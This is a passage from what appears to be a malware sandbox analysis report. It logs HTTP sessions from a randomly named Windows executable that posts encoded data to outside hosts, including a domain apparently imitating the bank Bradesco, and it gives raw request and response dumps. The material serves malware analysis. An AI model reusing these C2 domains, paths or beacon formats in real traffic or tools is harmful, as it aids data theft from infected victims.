30 30 75 66 4d 62 6a 67 76 39 6d 66 69 72 57 75 43 47 43 4d 5a 53 68 44 75 46 59 32 77 35 45 74 64 44 75 77 36 65 65 75 6e 36 52 45 44 39 4c 74 2b 4d 6d 75 45 6a 36 4e 65 2f 4a 73 59 59 77 41 6e 77 2f 38 38 36 37 52 63 47 45 69 33 78 61 41 63 4a 56 43 35 67 35 68 59 4b 2f 69 30 36 62 6d 69 63 58 43 32 50 42 61 66 64 79 4d 49 56 74 50 35 4d 57 4c 69 71 77 51 3d 3d Data Ascii: K29=/Uwh8kvFWO7Rs8rBwQDFe3Wb2hKYinzBjbDH7EOwmdtM2nEw0dNZf/0/ULm+XWqyyG7w5cpW/TAX0q8OkorgTDJyGOKdIGxtqX47ppRxbm00ufMbjgv9mfirWuCGCMZShDuFY2w5EtdDuw6eeun6RED9Lt+MmuEj6Ne/JsYYwAnw/8867RcGEi3xaAcJVC5g5hYK/i06bmicXC2PBafdyMIVtP5MWLiqwQ==
Oct 15, 2024 16:20:20.243272066 CEST	814	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Tue, 15 Oct 2024 14:20:20 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 54 6d 6f 9b 30 10 fe de 5f c1 f8 50 6d d2 c2 6b ba 26 2b ee d4 66 6d 5e 44 93 35 6a 93 90 2f 95 b1 dd 60 6a 6c 0a 06 82 a6 fd f7 f1 52 35 4c d9 3e cc 48 d8 77 be 7b ee ee 39 db ce 87 ef 8b d1 83 f7 e3 46 09 64 c4 2e 4f 9c 7a 52 18 e4 3b a0 12 ae 5e 9e 28 d5 70 02 02 71 bb 6c c4 88 48 a8 a0 00 26 29 91 40 7d 7c b8 ed 0d de 2c 0f db 81 94 71 8f bc 66 34 07 ea be 97 c1 1e 12 51 0c 25 f5 19 51 15 24 b8 24 bc f2 9d de 00 82 77 e4 c8 9b c3 88 00 35 a7 a4 88 45 22 3b 0e 05 c5 32 00 98 e4 14 91 5e 23 7c 56 28 a7 92 42 d6 4b 11 64 04 98 9a d1 85 93 54 32 72 e9 e8 ed dc 94 d3 24 c9 45 8a 12 1a cb 43 59 7f cf 3d 21 cf 09 49 83 4e 0a c6 45 96 30 50 d7 f7 55 d7 8b a2 38 37 34 c4 68 55 0e f1 13 88 49 8a 84 26 38 a3 9c e8 aa a2 1f e0 1d fd 38 a4 d3 30 d9 a5 ea 38 dc d9 ff 87 73 f4 43 c3 1c 5f e0 52 a9 12 12 10 03 15 8b a7 76 f9 f1 53 97 a4 96 0a 45 96 71 c5 ba 24 7b a9 87 30 87 ad b6 63 57 33 f4 9c 71 24 a9 e0 4a 07 4a f9 f9 ce 6b 6d 52 8f 82 72 2c 0a 4d 8a 58 63 02 [TRUNCATED] Data Ascii: 26ETmo0_Pmk&+fm^D5j/`jlR5L>Hw{9Fd.OzR;^(pqlH&)@}\|,qf4Q%Q$$w5E";2^#\|V(BKdT2r$ECY=!INE0PU874hUI&8808sC_RvSEq${0cW3q$JJkmRr,MXcU}\E\!.iV,0B$y.(zzE]x-;fQ92MEh1DkLXAml<U+fYGslMH-zn74)_22d)>@g1}:zEmBo}.U3_Uf'[s`n;A~zqga \|zG~K^E7qO)0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	53124	96.126.123.244	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:20:22.150645971 CEST	1830	OUT	POST /wouj/ HTTP/1.1 Host: www.clientebradesco.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.clientebradesco.online Content-Length: 1244 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.clientebradesco.online/wouj/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 4b 32 39 3d 2f 55 77 68 38 6b 76 46 57 4f 37 52 73 38 72 42 77 51 44 46 65 33 57 62 32 68 4b 59 69 6e 7a 42 6a 62 44 48 37 45 4f 77 6d 64 31 4d 33 55 4d 77 30 2b 56 5a 65 2f 30 2f 65 72 6d 2f 58 57 71 72 79 47 7a 30 35 63 6c 67 2f 57 45 58 31 4d 41 4f 69 5a 72 67 61 44 4a 79 50 75 4b 51 48 6d 78 34 71 58 49 42 70 70 68 78 62 6d 30 30 75 5a 67 62 7a 45 44 39 6b 66 69 6f 52 75 43 4b 47 4d 5a 71 68 44 48 77 59 32 39 4d 46 64 39 44 75 51 71 65 63 63 2f 36 4f 30 44 2f 62 39 2f 5a 6d 76 34 43 36 4e 72 54 4a 73 38 2b 77 48 58 77 39 39 4a 33 2f 79 51 4b 63 44 48 4a 4f 67 55 49 4e 53 70 74 7a 6e 49 74 2f 54 38 31 46 56 65 69 59 33 48 54 50 62 2b 47 38 65 49 69 6b 61 74 61 58 2f 79 6d 6e 4f 66 51 7a 48 59 78 68 30 44 4f 71 4a 31 46 65 70 50 54 53 53 6e 67 31 44 65 6f 4b 48 65 37 58 41 49 35 55 68 7a 67 31 54 67 39 30 71 45 44 41 41 35 6d 33 66 49 35 6d 74 4b 67 50 75 76 6a 48 79 76 32 5a 53 70 48 35 70 55 6c 38 35 58 42 78 2b 5a 77 4a 49 55 7a 6a 6a 70 54 32 6b 4d 6f 2b 6f 4d 39 67 48 33 56 51 54 46 41 77 58 [TRUNCATED] Data Ascii: K29=/Uwh8kvFWO7Rs8rBwQDFe3Wb2hKYinzBjbDH7EOwmd1M3UMw0+VZe/0/erm/XWqryGz05clg/WEX1MAOiZrgaDJyPuKQHmx4qXIBpphxbm00uZgbzED9kfioRuCKGMZqhDHwY29MFd9DuQqecc/6O0D/b9/Zmv4C6NrTJs8+wHXw99J3/yQKcDHJOgUINSptznIt/T81FVeiY3HTPb+G8eIikataX/ymnOfQzHYxh0DOqJ1FepPTSSng1DeoKHe7XAI5Uhzg1Tg90qEDAA5m3fI5mtKgPuvjHyv2ZSpH5pUl85XBx+ZwJIUzjjpT2kMo+oM9gH3VQTFAwXXUM/r93GGSKihP911NEJs+UQBnnKapmZjpjvftfV1cSR5H51OuK5mZXx3wo4ELH465eJW8aYOh362ImWXJtPunkYkgdWlt7klmfnDedjb1j68sAPCxhMyEDMhQLmR/K0SqGmtZDMHa9QGWEzYKevpdpCPg2Den95EolNm2tU/whAhsVNxznFN+kQ2p/DlFhlYcFvnCL0zLJFXrnAZwWJUi+tAOmSiZZupvSzjRz3/RS37lQZUto0x3WsiG65Z6UyVbEXoi2GJCf5pUzc2FHZHtTuuoxHDb5QRrHguLxMw0rv96Hufh5mDbiENKl7xa6J1qZkv9fClF43wo3q+zokqpgRVeM2z4xIOjP7V5VXVAF63m17GEmagy7TW6RINbOriO+Bq43RpeQNJx3scwm30TW8oMOY1BUqu/V4fI+eX/Ztins+KAnCisBYrftMwN9aX6vmna2L6Lc3a/leIbyYLTIF1hwMYoHZh50/BOT+4dirMP3ZuMzugQ1DHj6Om+P/fwhEEpfdlSMsCvbykpATTwFvJkT8eOayrm/YZEuF4+G5o2+o8KH8BY4xeUXx9MXLUgXtn50lZ0id3u9Cg+PEYIFxqmrl+3Y7B8QFSK3ZvUpTAXPD4R57NmFnaCrd47A2aj4W1w1rpLL8q8y5kimwMcfuaAOg2/0khd [TRUNCATED]
Oct 15, 2024 16:20:22.791949034 CEST	815	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Tue, 15 Oct 2024 14:20:22 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 36 46 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 54 4d 73 9b 30 10 bd f7 57 50 0e 99 76 a6 e6 cb 38 b6 1b 94 4e e2 26 fe 18 62 37 9e c4 36 be 64 84 a4 18 11 21 11 10 60 a6 d3 ff 5e c0 99 98 8e db 43 75 40 da 65 df db dd b7 20 e7 e3 f7 c5 e8 c1 fb 71 a3 04 32 62 97 1f 9c 7a 53 18 e4 3b a0 12 ae 5e 7e 50 aa e5 04 04 e2 c3 b1 31 23 22 a1 82 02 98 a4 44 02 f5 f1 e1 b6 33 78 8b 3c be 0e a4 8c 3b e4 35 a3 39 50 f7 9d 0c 76 90 88 62 28 a9 cf 88 aa 20 c1 25 e1 15 76 7a 03 08 de 91 13 34 87 11 01 6a 4e 49 11 8b 44 b6 00 05 c5 32 00 98 e4 14 91 4e 63 7c 51 28 a7 92 42 d6 49 11 64 04 98 9a d1 a6 93 54 32 72 e9 e8 87 bd 69 a7 29 92 8b 14 25 34 96 c7 b6 fe 5e 7b 42 9e 13 92 06 ad 12 8c 8b 2c 61 a0 ee ef ab ae 17 45 d1 37 34 c4 68 d5 0e f1 13 88 49 8a 84 26 38 a3 9c e8 aa a2 1f e9 1d fd 34 a5 d3 28 d9 96 ea 34 5d ef ff d3 39 fa 71 60 8e 2f 70 a9 54 05 09 88 81 8a c5 d3 e1 f8 e9 73 5b a4 83 14 8a 2c e3 4a 75 49 f6 52 0f 61 0e 0f de 56 5c ad d0 73 c6 91 a4 82 2b 2d 2a e5 e7 bb ae 75 48 bd 0a ca b1 28 34 29 62 8d 09 [TRUNCATED] Data Ascii: 26FTMs0WPv8N&b76d!`^Cu@e q2bzS;^~P1#"D3x<;59Pvb( %vz4jNID2Nc\|Q(BIdT2ri)%4^{B,aE74hI&84(4]9q`/pTs[,JuIRaV\s+-uH(4)bT]p-SpogaZ=b`aXei10&rf.u8kA63t4mlf}3'bA9S^ex(}n_r?~ckhB:8vsmLC%#N4xC.Ros]cze[vNfFv31g8`k=&[>z07 q?ZYAG-0>^1_GF7Xi)0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	53125	96.126.123.244	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:20:24.700927973 CEST	519	OUT	GET /wouj/?ahL=jjndrjuPIn2hz&K29=yWYB/R3wDrDMgv7/2h3mR36Svhbv8gHDqbTO7lKikOEauwAayMxscd89e9z4JUSFkkGyyfBsvTMtsJwN77reSgxnPdmtMD5avihqpJBRdkkD2f8itAXfl8WSacuACOBToGOGQWQ= HTTP/1.1 Host: www.clientebradesco.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Oct 15, 2024 16:20:25.319986105 CEST	1236	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Tue, 15 Oct 2024 14:20:25 GMT content-type: text/html transfer-encoding: chunked connection: close Data Raw: 34 43 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 63 6c 69 65 6e 74 65 [TRUNCATED] Data Ascii: 4C5<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.clientebradesco.online/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.clientebradesco.online/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.clientebradesco.online/wouj?gp=1&js=1&uuid=1729002025.0056686924&other_args=eyJ1cmkiOiAiL3dvdWoiLCAiYXJncyI6ICJhaEw9ampuZHJqdVBJbjJoeiZLMjk9eVdZQi9SM3dEckRNZ3Y3LzJoM21SMzZTdmhidjhnSERxYlRPN2xLaWtPRWF1d0FheU14c2NkODllOXo0SlVTRmtrR3l5ZkJzdlRNdHNKd043N3JlU2d4blBkbXRNRDVhdmlocXBKQlJka2tEMmY4aXRBWGZsOFdTYWN1QUNPQlRvR09HUVdRPSIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9o [TRUNCATED]
Oct 15, 2024 16:20:25.320231915 CEST	153	IN	Data Raw: 5a 32 55 76 64 32 56 69 63 43 78 70 62 57 46 6e 5a 53 39 68 63 47 35 6e 4c 43 6f 76 4b 6a 74 78 50 54 41 75 4f 43 78 68 63 48 42 73 61 57 4e 68 64 47 6c 76 62 69 39 7a 61 57 64 75 5a 57 51 74 5a 58 68 6a 61 47 46 75 5a 32 55 37 64 6a 31 69 4d 7a Data Ascii: Z2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOCxhcHBsaWNhdGlvbi9zaWduZWQtZXhjaGFuZ2U7dj1iMztxPTAuNyJ9"; } </script> </body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	53126	103.144.219.16	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:20:31.123330116 CEST	769	OUT	POST /4qyv/ HTTP/1.1 Host: www.www00437.email Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.www00437.email Content-Length: 208 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.www00437.email/4qyv/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 4b 32 39 3d 56 6a 73 6a 4c 2f 62 50 45 32 78 33 55 69 50 30 37 31 4f 37 63 44 4f 70 4d 54 45 30 64 4f 35 68 58 4f 58 55 70 72 47 74 52 54 79 43 65 39 50 33 54 41 4c 66 34 61 4d 45 4f 39 43 39 79 65 51 73 6e 35 35 49 74 33 63 6d 6c 71 67 70 41 49 5a 48 6b 59 54 4f 76 4d 76 32 6d 6b 36 46 4d 30 62 6a 69 4d 6f 2f 78 33 6b 64 36 62 71 32 43 56 38 36 68 4f 69 76 74 72 39 7a 74 65 73 6a 68 69 6d 66 36 69 4a 6f 46 53 64 4c 47 6c 6d 41 43 52 33 51 6a 63 46 77 6c 6d 51 5a 61 54 45 6e 46 6c 39 74 31 43 68 36 6d 4a 72 46 4c 49 66 44 4b 48 6d 74 47 65 6b 4c 43 56 78 45 6d 56 7a 5a 6f 59 6c 33 34 42 56 66 45 77 42 5a 4c 41 76 6c Data Ascii: K29=VjsjL/bPE2x3UiP071O7cDOpMTE0dO5hXOXUprGtRTyCe9P3TALf4aMEO9C9yeQsn55It3cmlqgpAIZHkYTOvMv2mk6FM0bjiMo/x3kd6bq2CV86hOivtr9ztesjhimf6iJoFSdLGlmACR3QjcFwlmQZaTEnFl9t1Ch6mJrFLIfDKHmtGekLCVxEmVzZoYl34BVfEwBZLAvl
Oct 15, 2024 16:20:32.092654943 CEST	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 15 Oct 2024 14:20:31 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	53127	103.144.219.16	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:20:33.673111916 CEST	793	OUT	POST /4qyv/ HTTP/1.1 Host: www.www00437.email Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.www00437.email Content-Length: 232 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.www00437.email/4qyv/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 4b 32 39 3d 56 6a 73 6a 4c 2f 62 50 45 32 78 33 53 42 6e 30 35 57 57 37 55 44 4f 6d 43 7a 45 30 58 75 35 36 58 4f 62 55 70 71 43 39 51 68 57 43 62 6f 4c 33 63 69 7a 66 37 61 4d 45 58 4e 43 34 76 75 51 7a 6e 34 46 41 74 32 67 6d 6c 71 30 70 41 4b 42 48 6b 70 54 42 75 63 76 30 75 45 36 62 49 30 62 6a 69 4d 6f 2f 78 7a 4e 56 36 66 4f 32 43 6c 4d 36 67 72 43 67 75 72 39 73 6b 2b 73 6a 6c 69 6d 62 36 69 4a 77 46 58 30 6b 47 6e 75 41 43 51 48 51 6a 4f 39 76 2f 32 52 53 55 7a 46 73 56 67 4d 46 74 46 41 43 36 50 72 30 59 5a 75 67 50 78 6e 33 61 74 6b 6f 51 46 52 47 6d 58 72 72 6f 34 6c 64 36 42 74 66 57 6e 4e 2b 45 30 4b 47 70 43 53 55 65 2b 69 4a 47 61 4d 78 63 4b 58 31 6e 4c 71 2f 4e 51 3d 3d Data Ascii: K29=VjsjL/bPE2x3SBn05WW7UDOmCzE0Xu56XObUpqC9QhWCboL3cizf7aMEXNC4vuQzn4FAt2gmlq0pAKBHkpTBucv0uE6bI0bjiMo/xzNV6fO2ClM6grCgur9sk+sjlimb6iJwFX0kGnuACQHQjO9v/2RSUzFsVgMFtFAC6Pr0YZugPxn3atkoQFRGmXrro4ld6BtfWnN+E0KGpCSUe+iJGaMxcKX1nLq/NQ==
Oct 15, 2024 16:20:34.645158052 CEST	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 15 Oct 2024 14:20:34 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	53128	103.144.219.16	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:20:36.216567039 CEST	1806	OUT	POST /4qyv/ HTTP/1.1 Host: www.www00437.email Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.www00437.email Content-Length: 1244 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.www00437.email/4qyv/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 4b 32 39 3d 56 6a 73 6a 4c 2f 62 50 45 32 78 33 53 42 6e 30 35 57 57 37 55 44 4f 6d 43 7a 45 30 58 75 35 36 58 4f 62 55 70 71 43 39 51 68 65 43 62 36 44 33 54 6a 7a 66 36 61 4d 45 66 74 43 35 76 75 52 76 6e 35 74 45 74 32 73 59 6c 6f 4d 70 61 76 56 48 69 64 50 42 6b 63 76 30 69 6b 36 61 4d 30 62 79 69 4d 35 32 78 33 52 56 36 66 4f 32 43 6e 45 36 77 4f 69 67 69 4c 39 7a 74 65 73 2f 68 69 6d 6a 36 69 52 67 46 58 35 62 47 32 4f 41 42 7a 2f 51 6d 37 52 76 30 32 52 51 45 6a 46 2f 56 67 49 61 74 45 6f 34 36 50 32 70 59 61 79 67 4e 6b 4b 50 4a 5a 77 70 45 45 78 39 6c 47 44 2b 70 63 70 63 37 78 70 34 52 56 77 50 4b 57 79 73 69 58 57 53 55 75 72 50 52 4b 41 65 56 63 6d 35 7a 66 6a 41 50 43 48 54 34 6d 61 57 42 59 6b 4f 57 66 68 56 45 75 76 37 6a 58 49 51 50 65 62 67 55 70 37 38 5a 47 7a 45 36 7a 7a 65 4f 38 75 33 4a 47 45 45 46 6e 31 55 52 33 79 2f 42 73 49 4e 72 32 6e 58 42 50 50 47 36 36 77 6e 72 67 78 79 34 75 7a 47 4e 74 74 59 30 69 31 6f 77 6c 4f 47 73 6f 41 76 78 35 6f 74 64 34 57 36 41 6a 50 35 64 42 [TRUNCATED] Data Ascii: K29=VjsjL/bPE2x3SBn05WW7UDOmCzE0Xu56XObUpqC9QheCb6D3Tjzf6aMEftC5vuRvn5tEt2sYloMpavVHidPBkcv0ik6aM0byiM52x3RV6fO2CnE6wOigiL9ztes/himj6iRgFX5bG2OABz/Qm7Rv02RQEjF/VgIatEo46P2pYaygNkKPJZwpEEx9lGD+pcpc7xp4RVwPKWysiXWSUurPRKAeVcm5zfjAPCHT4maWBYkOWfhVEuv7jXIQPebgUp78ZGzE6zzeO8u3JGEEFn1UR3y/BsINr2nXBPPG66wnrgxy4uzGNttY0i1owlOGsoAvx5otd4W6AjP5dB042Cuy+gEDgxG5SJkOfgrzwkuqaWl4AcHbdpvP7zTfUk3t2uQifXkPbzAO9QUKvty38mid1CoBGfp7z5yF3xp8rndQU7/Q58uhlYJ8LA+ACDHgNHzd7iYBctHorWrDfO8so8qTQBXmtvXgZ+UGQcHNYdtZg/l/IDxQtC36MHha1IRmc5ZKgwzzdm+/CipiSm7DfzU9NJorkzQ6haCZRuiJAeQi5wnN1Y3hO4vEh58XRNsmPMSP4GsqTqGGrB8GpwpV+sbZqEJmWfwEXoWySdmmcpBtTQ0HUScZ1edOPJ7Xu/zoBBFtFRGWuu2h/l/Uee1pXeJTDEOv/zbyJegyYIezfsP+pmmm/6qTUl+a5yBD0yM/rc+KxKlN9digUIrvmeQ+bqM3X/3LbGaGlAz1wVVkULpD9ECx3iceqpSsH0bq34b6AuvhlL74iiIU08KZGV937XymtshTKOYauIHbCrWD+qI9t2cEC09KqQuBFTPZgisy4qSWfwWIxwZfGAaGTo4HMQ6UPEZKHDkglyUvL0lqtRR+Ylm9B3GBI1g0xMGKmvXX3s15IGoDxvJReeBUk7+Rw+infM99sdfYLpMakMhD1PiHzDuSpgs+ILKWqFbTTZ4b9LnAsrBq8HVxAEzCeEm8HFAMRDmhTBUJSxdimqBzyBe05jbAVMxO [TRUNCATED]
Oct 15, 2024 16:20:37.209669113 CEST	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 15 Oct 2024 14:20:37 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	53129	103.144.219.16	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:20:38.773154020 CEST	511	OUT	GET /4qyv/?K29=YhEDIJyIBDBVYSqg/FaaSQqWMygBCOgWZYLNoJq+YB+tZNzGQAjy4s0gWfbYy8w7+pcTl2oQj4oxHqFf55zNlc3DsUGtLEv5hvA87zMOkIiiPi8ruquKn/Z/ppEenRSay39fUXM=&ahL=jjndrjuPIn2hz HTTP/1.1 Host: www.www00437.email Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Oct 15, 2024 16:20:39.793029070 CEST	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 15 Oct 2024 14:20:39 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	53130	84.32.84.32	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
